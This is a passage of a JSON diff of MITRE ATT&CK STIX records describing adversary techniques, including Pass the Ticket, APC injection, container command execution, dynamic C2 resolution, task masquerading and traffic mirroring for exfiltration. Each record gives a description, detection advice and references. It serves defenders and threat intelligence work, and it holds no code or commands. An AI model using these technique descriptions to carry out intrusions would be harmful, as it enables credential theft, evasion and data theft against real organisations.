Technique. Retrieved August 26, 2019.", + "url": "https://www.221bluestreet.com/post/office-templates-and-globaldotname-a-stealthy-office-persistence-technique" + }, + { + "source_name": "CrowdStrike Outlook Forms", + "description": "Parisi, T., et al. (2017, July). Using Outlook Forms for Lateral Movement and Persistence. Retrieved February 5, 2019.", + "url": "https://malware.news/t/using-outlook-forms-for-lateral-movement-and-persistence/13746" + }, + { + "source_name": "Outlook Today Home Page", + "description": "Soutcast. (2018, September 14). Outlook Today Homepage Persistence. Retrieved February 5, 2019.", + "url": "https://medium.com/@bwtech789/outlook-today-homepage-persistence-33ea9b505943" + } + ], + "object_marking_refs": [ + "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168" + ] + }, + { + "modified": "2022-04-25T14:00:00.188Z", + "name": "Virtual Private Server", + "description": "Adversaries may rent Virtual Private Servers (VPSs) that can be used during targeting. There exist a variety of cloud service providers that will sell virtual machines/containers as a service. By utilizing a VPS, adversaries can make it difficult to physically tie back operations to them. The use of cloud infrastructure can also make it easier for adversaries to rapidly provision, modify, and shut down their infrastructure.\n\nAcquiring a VPS for use in later stages of the adversary lifecycle, such as Command and Control, can allow adversaries to benefit from the ubiquity and trust associated with higher reputation cloud service providers. Adversaries may also acquire infrastructure from VPS service providers that are known for renting VPSs with minimal registration information, allowing for more anonymous acquisitions of infrastructure.(Citation: TrendmicroHideoutsLease)", + "kill_chain_phases": [ + { + "kill_chain_name": "mitre-attack", + "phase_name": "resource-development" + } + ], + "x_mitre_attack_spec_version": "2.1.0", + "x_mitre_contributors": [], + "x_mitre_detection": "Once adversaries have provisioned a VPS (ex: for use as a command and control server), internet scans may reveal servers that adversaries have acquired. Consider looking for identifiable patterns such as services listening, certificates in use, SSL/TLS negotiation features, or other response artifacts associated with adversary C2 software.(Citation: ThreatConnect Infrastructure Dec 2020)(Citation: Mandiant SCANdalous Jul 2020)(Citation: Koczwara Beacon Hunting Sep 2021)\n\nMuch of this activity will take place outside the visibility of the target organization, making detection of this behavior difficult. Detection efforts may be focused on related stages of the adversary lifecycle, such as during Command and Control.", + "x_mitre_domains": [ + "enterprise-attack" + ], + "x_mitre_is_subtechnique": true, + "x_mitre_modified_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", + "x_mitre_platforms": [ + "PRE" + ], + "x_mitre_version": "1.1", + "x_mitre_data_sources": [], + "type": "attack-pattern", + "spec_version": "2.1", + "id": "attack-pattern--79da0971-3147-4af6-a4f5-e8cd447cd795", + "created": "2020-10-01T00:44:23.935Z", + "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", + "external_references": [ + { + "source_name": "mitre-attack", + "url": "https://attack.mitre.org/techniques/T1583/003", + "external_id": "T1583.003" + }, + { + "source_name": "TrendmicroHideoutsLease", + "description": "Max Goncharov. (2015, July 15). Criminal Hideouts for Lease: Bulletproof Hosting Services. Retrieved March 6, 2017.", + "url": "https://documents.trendmicro.com/assets/wp/wp-criminal-hideouts-for-lease.pdf" + }, + { + "source_name": "ThreatConnect Infrastructure Dec 2020", + "description": "ThreatConnect. (2020, December 15). Infrastructure Research and Hunting: Boiling the Domain Ocean. Retrieved October 12, 2021.", + "url": "https://threatconnect.com/blog/infrastructure-research-hunting/" + }, + { + "source_name": "Mandiant SCANdalous Jul 2020", + "description": "Stephens, A. (2020, July 13). SCANdalous! (External Detection Using Network Scan Data and Automation). Retrieved October 12, 2021.", + "url": "https://www.mandiant.com/resources/scandalous-external-detection-using-network-scan-data-and-automation" + }, + { + "source_name": "Koczwara Beacon Hunting Sep 2021", + "description": "Koczwara, M. (2021, September 7). Hunting Cobalt Strike C2 with Shodan. Retrieved October 12, 2021.", + "url": "https://michaelkoczwara.medium.com/cobalt-strike-c2-hunting-with-shodan-c448d501a6e2" + } + ], + "object_marking_refs": [ + "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168" + ] + }, + { + "modified": "2022-04-25T14:00:00.188Z", + "name": "Confluence", + "description": "\nAdversaries may leverage Confluence repositories to mine valuable information. Often found in development environments alongside Atlassian JIRA, Confluence is generally used to store development-related documentation, however, in general may contain more diverse categories of useful information, such as:\n\n* Policies, procedures, and standards\n* Physical / logical network diagrams\n* System architecture diagrams\n* Technical system documentation\n* Testing / development credentials\n* Work / project schedules\n* Source code snippets\n* Links to network shares and other internal resources\n", + "kill_chain_phases": [ + { + "kill_chain_name": "mitre-attack", + "phase_name": "collection" + } + ], + "x_mitre_attack_spec_version": "2.1.0", + "x_mitre_contributors": [], + "x_mitre_detection": "Monitor access to Confluence repositories performed by privileged users (for example, Active Directory Domain, Enterprise, or Schema Administrators) as these types of accounts should generally not be used to access information repositories. If the capability exists, it may be of value to monitor and alert on users that are retrieving and viewing a large number of documents and pages; this behavior may be indicative of programmatic means being used to retrieve all data within the repository. In environments with high-maturity, it may be possible to leverage User-Behavioral Analytics (UBA) platforms to detect and alert on user based anomalies.\n\nUser access logging within Atlassian's Confluence can be configured to report access to certain pages and documents through AccessLogFilter. (Citation: Atlassian Confluence Logging) Additional log storage and analysis infrastructure will likely be required for more robust detection capabilities.", + "x_mitre_domains": [ + "enterprise-attack" + ], + "x_mitre_is_subtechnique": true, + "x_mitre_modified_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", + "x_mitre_platforms": [ + "SaaS" + ], + "x_mitre_version": "1.0", + "x_mitre_data_sources": [], + "x_mitre_permissions_required": [ + "User" + ], + "type": "attack-pattern", + "spec_version": "2.1", + "id": "attack-pattern--7ad38ef1-381a-406d-872a-38b136eb5ecc", + "created": "2020-02-14T13:09:51.004Z", + "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", + "external_references": [ + { + "source_name": "mitre-attack", + "url": "https://attack.mitre.org/techniques/T1213/001", + "external_id": "T1213.001" + }, + { + "source_name": "Atlassian Confluence Logging", + "description": "Atlassian. (2018, January 9). How to Enable User Access Logging. Retrieved April 4, 2018.", + "url": "https://confluence.atlassian.com/confkb/how-to-enable-user-access-logging-182943.html" + } + ], + "object_marking_refs": [ + "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168" + ] + }, + { + "modified": "2023-10-31T14:00:00.188Z", + "name": "Pass the Ticket", + "description": "Adversaries may “pass the ticket” using stolen Kerberos tickets to move laterally within an environment, bypassing normal system access controls. Pass the ticket (PtT) is a method of authenticating to a system using Kerberos tickets without having access to an account's password. Kerberos authentication can be used as the first step to lateral movement to a remote system.\n\nWhen preforming PtT, valid Kerberos tickets for [Valid Accounts](https://attack.mitre.org/techniques/T1078) are captured by [OS Credential Dumping](https://attack.mitre.org/techniques/T1003). A user's service tickets or ticket granting ticket (TGT) may be obtained, depending on the level of access. A service ticket allows for access to a particular resource, whereas a TGT can be used to request service tickets from the Ticket Granting Service (TGS) to access any resource the user has privileges to access.(Citation: ADSecurity AD Kerberos Attacks)(Citation: GentilKiwi Pass the Ticket)\n\nA [Silver Ticket](https://attack.mitre.org/techniques/T1558/002) can be obtained for services that use Kerberos as an authentication mechanism and are used to generate tickets to access that particular resource and the system that hosts the resource (e.g., SharePoint).(Citation: ADSecurity AD Kerberos Attacks)\n\nA [Golden Ticket](https://attack.mitre.org/techniques/T1558/001) can be obtained for the domain using the Key Distribution Service account KRBTGT account NTLM hash, which enables generation of TGTs for any account in Active Directory.(Citation: Campbell 2014)\n\nAdversaries may also create a valid Kerberos ticket using other user information, such as stolen password hashes or AES keys. For example, \"overpassing the hash\" involves using a NTLM password hash to authenticate as a user (i.e. [Pass the Hash](https://attack.mitre.org/techniques/T1550/002)) while also using the password hash to create a valid Kerberos ticket.(Citation: Stealthbits Overpass-the-Hash)", + "kill_chain_phases": [ + { + "kill_chain_name": "mitre-attack", + "phase_name": "defense-evasion" + }, + { + "kill_chain_name": "mitre-attack", + "phase_name": "lateral-movement" + } + ], + "x_mitre_attack_spec_version": "3.1.0", + "x_mitre_contributors": [ + "Vincent Le Toux", + "Ryan Becwar" + ], + "x_mitre_detection": "Audit all Kerberos authentication and credential use events and review for discrepancies. Unusual remote authentication events that correlate with other suspicious activity (such as writing and executing binaries) may indicate malicious activity.\n\nEvent ID 4769 is generated on the Domain Controller when using a golden ticket after the KRBTGT password has been reset twice, as mentioned in the mitigation section. The status code 0x1F indicates the action has failed due to \"Integrity check on decrypted field failed\" and indicates misuse by a previously invalidated golden ticket.(Citation: CERT-EU Golden Ticket Protection)", + "x_mitre_domains": [ + "enterprise-attack" + ], + "x_mitre_is_subtechnique": true, + "x_mitre_modified_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", + "x_mitre_platforms": [ + "Windows" + ], + "x_mitre_version": "1.1", + "x_mitre_data_sources": [], + "x_mitre_defense_bypassed": [ + "System Access Controls" + ], + "x_mitre_system_requirements": [ + "Kerberos authentication enabled" + ], + "type": "attack-pattern", + "spec_version": "2.1", + "id": "attack-pattern--7b211ac6-c815-4189-93a9-ab415deca926", + "created": "2020-01-30T17:03:43.072Z", + "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", + "external_references": [ + { + "source_name": "mitre-attack", + "url": "https://attack.mitre.org/techniques/T1550/003", + "external_id": "T1550.003" + }, + { + "source_name": "ADSecurity AD Kerberos Attacks", + "description": "Metcalf, S. (2014, November 22). Mimikatz and Active Directory Kerberos Attacks. Retrieved June 2, 2016.", + "url": "https://adsecurity.org/?p=556" + }, + { + "source_name": "GentilKiwi Pass the Ticket", + "description": "Deply, B. (2014, January 13). Pass the ticket. Retrieved June 2, 2016.", + "url": "http://blog.gentilkiwi.com/securite/mimikatz/pass-the-ticket-kerberos" + }, + { + "source_name": "Campbell 2014", + "description": "Campbell, C. (2014). The Secret Life of Krbtgt. Retrieved December 4, 2014.", + "url": "http://defcon.org/images/defcon-22/dc-22-presentations/Campbell/DEFCON-22-Christopher-Campbell-The-Secret-Life-of-Krbtgt.pdf" + }, + { + "source_name": "Stealthbits Overpass-the-Hash", + "description": "Warren, J. (2019, February 26). How to Detect Overpass-the-Hash Attacks. Retrieved February 4, 2021.", + "url": "https://stealthbits.com/blog/how-to-detect-overpass-the-hash-attacks/" + }, + { + "source_name": "CERT-EU Golden Ticket Protection", + "description": "Abolins, D., Boldea, C., Socha, K., Soria-Machado, M. (2016, April 26). Kerberos Golden Ticket Protection. Retrieved July 13, 2017.", + "url": "https://cert.europa.eu/static/WhitePapers/UPDATED%20-%20CERT-EU_Security_Whitepaper_2014-007_Kerberos_Golden_Ticket_Protection_v1_4.pdf" + } + ], + "object_marking_refs": [ + "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168" + ] + }, + { + "modified": "2023-05-09T14:00:00.188Z", + "name": "Container Administration Command", + "description": "Adversaries may abuse a container administration service to execute commands within a container. A container administration service such as the Docker daemon, the Kubernetes API server, or the kubelet may allow remote management of containers within an environment.(Citation: Docker Daemon CLI)(Citation: Kubernetes API)(Citation: Kubernetes Kubelet)\n\nIn Docker, adversaries may specify an entrypoint during container deployment that executes a script or command, or they may use a command such as docker exec to execute a command within a running container.(Citation: Docker Entrypoint)(Citation: Docker Exec) In Kubernetes, if an adversary has sufficient permissions, they may gain remote execution in a container in the cluster via interaction with the Kubernetes API server, the kubelet, or by running a command such as kubectl exec.(Citation: Kubectl Exec Get Shell)", + "kill_chain_phases": [ + { + "kill_chain_name": "mitre-attack", + "phase_name": "execution" + } + ], + "x_mitre_attack_spec_version": "3.1.0", + "x_mitre_contributors": [ + "Alfredo Oliveira, Trend Micro", + "David Fiser, @anu4is, Trend Micro", + "Brad Geesaman, @bradgeesaman", + "Center for Threat-Informed Defense (CTID)", + "Magno Logan, @magnologan, Trend Micro", + "Vishwas Manral, McAfee", + "Yossi Weizman, Azure Defender Research Team" + ], + "x_mitre_deprecated": false, + "x_mitre_detection": "Container administration service activities and executed commands can be captured through logging of process execution with command-line arguments on the container and the underlying host. In Docker, the daemon log provides insight into events at the daemon and container service level. Kubernetes system component logs may also detect activities running in and out of containers in the cluster. ", + "x_mitre_domains": [ + "enterprise-attack" + ], + "x_mitre_is_subtechnique": false, + "x_mitre_modified_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", + "x_mitre_platforms": [ + "Containers" + ], + "x_mitre_version": "1.2", + "x_mitre_data_sources": [], + "x_mitre_remote_support": true, + "type": "attack-pattern", + "spec_version": "2.1", + "id": "attack-pattern--7b50a1d3-4ca7-45d1-989d-a6503f04bfe1", + "created": "2021-03-29T16:39:26.183Z", + "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", + "revoked": false, + "external_references": [ + { + "source_name": "mitre-attack", + "url": "https://attack.mitre.org/techniques/T1609", + "external_id": "T1609" + }, + { + "source_name": "Docker Exec", + "description": "Docker. (n.d.). Docker Exec. Retrieved March 29, 2021.", + "url": "https://docs.docker.com/engine/reference/commandline/exec/" + }, + { + "source_name": "Docker Entrypoint", + "description": "Docker. (n.d.). Docker run reference. Retrieved March 29, 2021.", + "url": "https://docs.docker.com/engine/reference/run/#entrypoint-default-command-to-execute-at-runtime" + }, + { + "source_name": "Docker Daemon CLI", + "description": "Docker. (n.d.). DockerD CLI. Retrieved March 29, 2021.", + "url": "https://docs.docker.com/engine/reference/commandline/dockerd/" + }, + { + "source_name": "Kubectl Exec Get Shell", + "description": "The Kubernetes Authors. (n.d.). Get a Shell to a Running Container. Retrieved March 29, 2021.", + "url": "https://kubernetes.io/docs/tasks/debug-application-cluster/get-shell-running-container/" + }, + { + "source_name": "Kubernetes Kubelet", + "description": "The Kubernetes Authors. (n.d.). Kubelet. Retrieved March 29, 2021.", + "url": "https://kubernetes.io/docs/reference/command-line-tools-reference/kubelet/" + }, + { + "source_name": "Kubernetes API", + "description": "The Kubernetes Authors. (n.d.). The Kubernetes API. Retrieved March 29, 2021.", + "url": "https://kubernetes.io/docs/concepts/overview/kubernetes-api/" + } + ], + "object_marking_refs": [ + "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168" + ] + }, + { + "modified": "2024-04-16T12:40:10.978Z", + "name": "File and Directory Discovery", + "description": "Adversaries may enumerate files and directories or may search in specific locations of a host or network share for certain information within a file system. Adversaries may use the information from [File and Directory Discovery](https://attack.mitre.org/techniques/T1083) during automated discovery to shape follow-on behaviors, including whether or not the adversary fully infects the target and/or attempts specific actions.\n\nMany command shell utilities can be used to obtain this information. Examples include dir, tree, ls, find, and locate.(Citation: Windows Commands JPCERT) Custom tools may also be used to gather file and directory information and interact with the [Native API](https://attack.mitre.org/techniques/T1106). Adversaries may also leverage a [Network Device CLI](https://attack.mitre.org/techniques/T1059/008) on network devices to gather file and directory information (e.g. dir, show flash, and/or nvram).(Citation: US-CERT-TA18-106A)\n\nSome files and directories may require elevated or specific user permissions to access.", + "kill_chain_phases": [ + { + "kill_chain_name": "mitre-attack", + "phase_name": "discovery" + } + ], + "x_mitre_attack_spec_version": "3.2.0", + "x_mitre_contributors": [ + "Austin Clark, @c2defense" + ], + "x_mitre_deprecated": false, + "x_mitre_detection": "System and network discovery techniques normally occur throughout an operation as an adversary learns the environment. Data and events should not be viewed in isolation, but as part of a chain of behavior that could lead to other activities, such as Collection and Exfiltration, based on the information obtained.\n\nMonitor processes and command-line arguments for actions that could be taken to gather system and network information. Remote access tools with built-in features may interact directly with the Windows API to gather information. Information may also be acquired through Windows system management tools such as [Windows Management Instrumentation](https://attack.mitre.org/techniques/T1047) and [PowerShell](https://attack.mitre.org/techniques/T1059/001). Further, [Network Device CLI](https://attack.mitre.org/techniques/T1059/008) commands may also be used to gather file and directory information with built-in features native to the network device platform. Monitor CLI activity for unexpected or unauthorized use of commands being run by non-standard users from non-standard locations. ", + "x_mitre_domains": [ + "enterprise-attack" + ], + "x_mitre_is_subtechnique": false, + "x_mitre_modified_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", + "x_mitre_platforms": [ + "Linux", + "macOS", + "Windows", + "Network" + ], + "x_mitre_version": "1.6", + "x_mitre_data_sources": [], + "type": "attack-pattern", + "spec_version": "2.1", + "id": "attack-pattern--7bc57495-ea59-4380-be31-a64af124ef18", + "created": "2017-05-31T21:31:04.710Z", + "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", + "revoked": false, + "external_references": [ + { + "source_name": "mitre-attack", + "url": "https://attack.mitre.org/techniques/T1083", + "external_id": "T1083" + }, + { + "source_name": "Windows Commands JPCERT", + "description": "Tomonaga, S. (2016, January 26). Windows Commands Abused by Attackers. Retrieved February 2, 2016.", + "url": "https://blogs.jpcert.or.jp/en/2016/01/windows-commands-abused-by-attackers.html" + }, + { + "source_name": "US-CERT-TA18-106A", + "description": "US-CERT. (2018, April 20). Alert (TA18-106A) Russian State-Sponsored Cyber Actors Targeting Network Infrastructure Devices. Retrieved October 19, 2020.", + "url": "https://www.us-cert.gov/ncas/alerts/TA18-106A" + } + ], + "object_marking_refs": [ + "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168" + ] + }, + { + "modified": "2022-05-11T14:00:00.188Z", + "name": "Dynamic Resolution", + "description": "Adversaries may dynamically establish connections to command and control infrastructure to evade common detections and remediations. This may be achieved by using malware that shares a common algorithm with the infrastructure the adversary uses to receive the malware's communications. These calculations can be used to dynamically adjust parameters such as the domain name, IP address, or port number the malware uses for command and control.\n\nAdversaries may use dynamic resolution for the purpose of [Fallback Channels](https://attack.mitre.org/techniques/T1008). When contact is lost with the primary command and control server malware may employ dynamic resolution as a means to reestablishing command and control.(Citation: Talos CCleanup 2017)(Citation: FireEye POSHSPY April 2017)(Citation: ESET Sednit 2017 Activity)", + "kill_chain_phases": [ + { + "kill_chain_name": "mitre-attack", + "phase_name": "command-and-control" + } + ], + "x_mitre_attack_spec_version": "2.1.0", + "x_mitre_contributors": [ + "Chris Roffe" + ], + "x_mitre_detection": "Detecting dynamically generated C2 can be challenging due to the number of different algorithms, constantly evolving malware families, and the increasing complexity of the algorithms. There are multiple approaches to detecting a pseudo-randomly generated domain name, including using frequency analysis, Markov chains, entropy, proportion of dictionary words, ratio of vowels to other characters, and more (Citation: Data Driven Security DGA). CDN domains may trigger these detections due to the format of their domain names. In addition to detecting algorithm generated domains based on the name, another more general approach for detecting a suspicious domain is to check for recently registered names or for rarely visited domains.", + "x_mitre_domains": [ + "enterprise-attack" + ], + "x_mitre_is_subtechnique": false, + "x_mitre_modified_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", + "x_mitre_platforms": [ + "Linux", + "macOS", + "Windows" + ], + "x_mitre_version": "1.0", + "x_mitre_data_sources": [], + "x_mitre_permissions_required": [ + "User" + ], + "type": "attack-pattern", + "spec_version": "2.1", + "id": "attack-pattern--7bd9c723-2f78-4309-82c5-47cad406572b", + "created": "2020-03-10T17:28:11.747Z", + "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", + "external_references": [ + { + "source_name": "mitre-attack", + "url": "https://attack.mitre.org/techniques/T1568", + "external_id": "T1568" + }, + { + "source_name": "Talos CCleanup 2017", + "description": "Brumaghin, E. et al. (2017, September 18). CCleanup: A Vast Number of Machines at Risk. Retrieved March 9, 2018.", + "url": "http://blog.talosintelligence.com/2017/09/avast-distributes-malware.html" + }, + { + "source_name": "FireEye POSHSPY April 2017", + "description": "Dunwoody, M.. (2017, April 3). Dissecting One of APT29’s Fileless WMI and PowerShell Backdoors (POSHSPY). Retrieved April 5, 2017.", + "url": "https://www.fireeye.com/blog/threat-research/2017/03/dissecting_one_ofap.html" + }, + { + "source_name": "ESET Sednit 2017 Activity", + "description": "ESET. (2017, December 21). Sednit update: How Fancy Bear Spent the Year. Retrieved February 18, 2019.", + "url": "https://www.welivesecurity.com/2017/12/21/sednit-update-fancy-bear-spent-year/" + }, + { + "source_name": "Data Driven Security DGA", + "description": "Jacobs, J. (2014, October 2). Building a DGA Classifier: Part 2, Feature Engineering. Retrieved February 18, 2019.", + "url": "https://datadrivensecurity.info/blog/posts/2014/Oct/dga-part2/" + } + ], + "object_marking_refs": [ + "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168" + ] + }, + { + "modified": "2023-09-29T20:30:58.300Z", + "name": "Masquerade Task or Service", + "description": "Adversaries may attempt to manipulate the name of a task or service to make it appear legitimate or benign. Tasks/services executed by the Task Scheduler or systemd will typically be given a name and/or description.(Citation: TechNet Schtasks)(Citation: Systemd Service Units) Windows services will have a service name as well as a display name. Many benign tasks and services exist that have commonly associated names. Adversaries may give tasks or services names that are similar or identical to those of legitimate ones.\n\nTasks or services contain other fields, such as a description, that adversaries may attempt to make appear legitimate.(Citation: Palo Alto Shamoon Nov 2016)(Citation: Fysbis Dr Web Analysis)", + "kill_chain_phases": [ + { + "kill_chain_name": "mitre-attack", + "phase_name": "defense-evasion" + } + ], + "x_mitre_attack_spec_version": "3.2.0", + "x_mitre_contributors": [], + "x_mitre_deprecated": false, + "x_mitre_detection": "Look for changes to tasks and services that do not correlate with known software, patch cycles, etc. Suspicious program execution through scheduled tasks or services may show up as outlier processes that have not been seen before when compared against historical data. Monitor processes and command-line arguments for actions that could be taken to create tasks or services. Data and events should not be viewed in isolation, but as part of a chain of behavior that could lead to other activities, such as network connections made for Command and Control, learning details about the environment through Discovery, and Lateral Movement.", + "x_mitre_domains": [ + "enterprise-attack" + ], + "x_mitre_is_subtechnique": true, + "x_mitre_modified_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", + "x_mitre_platforms": [ + "Windows", + "Linux", + "macOS" + ], + "x_mitre_version": "1.2", + "x_mitre_data_sources": [], + "type": "attack-pattern", + "spec_version": "2.1", + "id": "attack-pattern--7bdca9d5-d500-4d7d-8c52-5fd47baf4c0c", + "created": "2020-02-10T20:30:07.426Z", + "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", + "revoked": false, + "external_references": [ + { + "source_name": "mitre-attack", + "url": "https://attack.mitre.org/techniques/T1036/004", + "external_id": "T1036.004" + }, + { + "source_name": "Fysbis Dr Web Analysis", + "description": "Doctor Web. (2014, November 21). Linux.BackDoor.Fysbis.1. Retrieved December 7, 2017.", + "url": "https://vms.drweb.com/virus/?i=4276269" + }, + { + "source_name": "Palo Alto Shamoon Nov 2016", + "description": "Falcone, R.. (2016, November 30). Shamoon 2: Return of the Disttrack Wiper. Retrieved January 11, 2017.", + "url": "http://researchcenter.paloaltonetworks.com/2016/11/unit42-shamoon-2-return-disttrack-wiper/" + }, + { + "source_name": "Systemd Service Units", + "description": "Freedesktop.org. (n.d.). systemd.service — Service unit configuration. Retrieved March 16, 2020.", + "url": "https://www.freedesktop.org/software/systemd/man/systemd.service.html" + }, + { + "source_name": "TechNet Schtasks", + "description": "Microsoft. (n.d.). Schtasks. Retrieved April 28, 2016.", + "url": "https://technet.microsoft.com/en-us/library/bb490996.aspx" + } + ], + "object_marking_refs": [ + "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168" + ] + }, + { + "modified": "2022-04-25T14:00:00.188Z", + "name": "Asynchronous Procedure Call", + "description": "Adversaries may inject malicious code into processes via the asynchronous procedure call (APC) queue in order to evade process-based defenses as well as possibly elevate privileges. APC injection is a method of executing arbitrary code in the address space of a separate live process. \n\nAPC injection is commonly performed by attaching malicious code to the APC Queue (Citation: Microsoft APC) of a process's thread. Queued APC functions are executed when the thread enters an alterable state.(Citation: Microsoft APC) A handle to an existing victim process is first created with native Windows API calls such as OpenThread. At this point QueueUserAPC can be used to invoke a function (such as LoadLibrayA pointing to a malicious DLL). \n\nA variation of APC injection, dubbed \"Early Bird injection\", involves creating a suspended process in which malicious code can be written and executed before the process' entry point (and potentially subsequent anti-malware hooks) via an APC. (Citation: CyberBit Early Bird Apr 2018) AtomBombing (Citation: ENSIL AtomBombing Oct 2016) is another variation that utilizes APCs to invoke malicious code previously written to the global atom table.(Citation: Microsoft Atom Table)\n\nRunning code in the context of another process may allow access to the process's memory, system/network resources, and possibly elevated privileges. Execution via APC injection may also evade detection from security products since the execution is masked under a legitimate process. ", + "kill_chain_phases": [ + { + "kill_chain_name": "mitre-attack", + "phase_name": "defense-evasion" + }, + { + "kill_chain_name": "mitre-attack", + "phase_name": "privilege-escalation" + } + ], + "x_mitre_attack_spec_version": "2.1.0", + "x_mitre_contributors": [], + "x_mitre_detection": "Monitoring Windows API calls indicative of the various types of code injection may generate a significant amount of data and may not be directly useful for defense unless collected under specific circumstances for known bad sequences of calls, since benign use of API functions may be common and difficult to distinguish from malicious behavior. Windows API calls such as SuspendThread/SetThreadContext/ResumeThread, QueueUserAPC/NtQueueApcThread, and those that can be used to modify memory within another process, such as VirtualAllocEx/WriteProcessMemory, may be used for this technique.(Citation: Elastic Process Injection July 2017)\n\nAnalyze process behavior to determine if a process is performing actions it usually does not, such as opening network connections, reading files, or other suspicious actions that could relate to post-compromise behavior. ", + "x_mitre_domains": [ + "enterprise-attack" + ], + "x_mitre_is_subtechnique": true, + "x_mitre_modified_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", + "x_mitre_platforms": [ + "Windows" + ], + "x_mitre_version": "1.1", + "x_mitre_data_sources": [], + "x_mitre_defense_bypassed": [ + "Application control", + "Anti-virus" + ], + "type": "attack-pattern", + "spec_version": "2.1", + "id": "attack-pattern--7c0f17c9-1af6-4628-9cbd-9e45482dd605", + "created": "2020-01-14T01:29:43.786Z", + "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", + "external_references": [ + { + "source_name": "mitre-attack", + "url": "https://attack.mitre.org/techniques/T1055/004", + "external_id": "T1055.004" + }, + { + "source_name": "Microsoft APC", + "description": "Microsoft. (n.d.). Asynchronous Procedure Calls. Retrieved December 8, 2017.", + "url": "https://msdn.microsoft.com/library/windows/desktop/ms681951.aspx" + }, + { + "source_name": "CyberBit Early Bird Apr 2018", + "description": "Gavriel, H. & Erbesfeld, B. (2018, April 11). New ‘Early Bird’ Code Injection Technique Discovered. Retrieved May 24, 2018.", + "url": "https://www.cyberbit.com/blog/endpoint-security/new-early-bird-code-injection-technique-discovered/" + }, + { + "source_name": "ENSIL AtomBombing Oct 2016", + "description": "Liberman, T. (2016, October 27). ATOMBOMBING: BRAND NEW CODE INJECTION FOR WINDOWS. Retrieved December 8, 2017.", + "url": "https://blog.ensilo.com/atombombing-brand-new-code-injection-for-windows" + }, + { + "source_name": "Microsoft Atom Table", + "description": "Microsoft. (n.d.). About Atom Tables. Retrieved December 8, 2017.", + "url": "https://msdn.microsoft.com/library/windows/desktop/ms649053.aspx" + }, + { + "source_name": "Elastic Process Injection July 2017", + "description": "Hosseini, A. (2017, July 18). Ten Process Injection Techniques: A Technical Survey Of Common And Trending Process Injection Techniques. Retrieved December 7, 2017.", + "url": "https://www.endgame.com/blog/technical-blog/ten-process-injection-techniques-technical-survey-common-and-trending-process" + } + ], + "object_marking_refs": [ + "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168" + ] + }, + { + "modified": "2023-04-14T23:23:30.327Z", + "name": "Traffic Duplication", + "description": "Adversaries may leverage traffic mirroring in order to automate data exfiltration over compromised infrastructure. Traffic mirroring is a native feature for some devices, often used for network analysis. For example, devices may be configured to forward network traffic to one or more destinations for analysis by a network analyzer or other monitoring device. (Citation: Cisco Traffic Mirroring)(Citation: Juniper Traffic Mirroring)\n\nAdversaries may abuse traffic mirroring to mirror or redirect network traffic through other infrastructure they control. Malicious modifications to network devices to enable traffic redirection may be possible through [ROMMONkit](https://attack.mitre.org/techniques/T1542/004) or [Patch System Image](https://attack.mitre.org/techniques/T1601/001).(Citation: US-CERT-TA18-106A)(Citation: Cisco Blog Legacy Device Attacks)\n\nMany cloud-based environments also support traffic mirroring. For example, AWS Traffic Mirroring, GCP Packet Mirroring, and Azure vTap allow users to define specified instances to collect traffic from and specified targets to send collected traffic to.(Citation: AWS Traffic Mirroring)(Citation: GCP Packet Mirroring)(Citation: Azure Virtual Network TAP)\n\nAdversaries may use traffic duplication in conjunction with [Network Sniffing](https://attack.mitre.org/techniques/T1040), [Input Capture](https://attack.mitre.org/techniques/T1056), or [Adversary-in-the-Middle](https://attack.mitre.org/techniques/T1557) depending on the goals and objectives of the adversary.", + "kill_chain_phases": [ + { + "kill_chain_name": "mitre-attack", + "phase_name": "exfiltration" + } + ], + "x_mitre_attack_spec_version": "3.1.0", + "x_mitre_contributors": [], + "x_mitre_deprecated": false, + "x_mitre_detection": "Monitor network traffic for uncommon data flows (e.g. unusual network communications, suspicious communications that have never been seen before, communications sending fixed size data packets at regular intervals). Analyze packet contents to detect communications that do not follow the expected protocol behavior for the port that is being used. ", + "x_mitre_domains": [ + "enterprise-attack" + ], + "x_mitre_is_subtechnique": true, + "x_mitre_modified_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", + "x_mitre_platforms": [ + "Network", + "IaaS" + ], + "x_mitre_version": "1.2", + "x_mitre_data_sources": [], + "x_mitre_network_requirements": false, + "type": "attack-pattern", + "spec_version": "2.1", + "id": "attack-pattern--7c46b364-8496-4234-8a56-f7e6727e21e1", + "created": "2020-10-19T13:40:11.118Z", + "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", + "revoked": false, + "external_references": [ + { + "source_name": "mitre-attack", + "url": "https://attack.mitre.org/techniques/T1020/001", + "external_id": "T1020.001" + }, + { + "source_name": "AWS Traffic Mirroring", + "description": "Amazon Web Services. (n.d.). How Traffic Mirroring works. Retrieved March 17, 2022.", + "url": "https://docs.aws.amazon.com/vpc/latest/mirroring/traffic-mirroring-how-it-works.html" + }, + { + "source_name": "Cisco Traffic Mirroring", + "description": "Cisco. (n.d.). Cisco IOS XR Interface and Hardware Component Configuration Guide 